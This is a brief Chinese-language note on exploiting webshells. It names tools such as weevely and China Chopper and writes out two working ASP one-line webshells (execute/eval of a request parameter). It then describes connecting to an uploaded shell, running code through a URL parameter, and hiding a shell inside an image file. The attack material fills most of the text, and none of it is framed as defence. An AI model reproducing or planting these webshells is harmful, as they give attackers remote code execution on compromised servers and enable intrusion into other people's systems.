webshell利用

一句话工具
weevely,中国菜刀

asp一句话木马
<%execute request("value")%>

我们上传了一句话木马后,可用中国菜刀进行连接
<%eval request("cmd")%>

webshell利用_第1张图片

原理 :执行http://xxxx/a.asp?cmd=phpinfo()
a.asp是一句话木马所在的位置

制作图片一句话
C32asm

抓http包
wsexplorer 根据应用显示抓的包

你可能感兴趣的:(linux)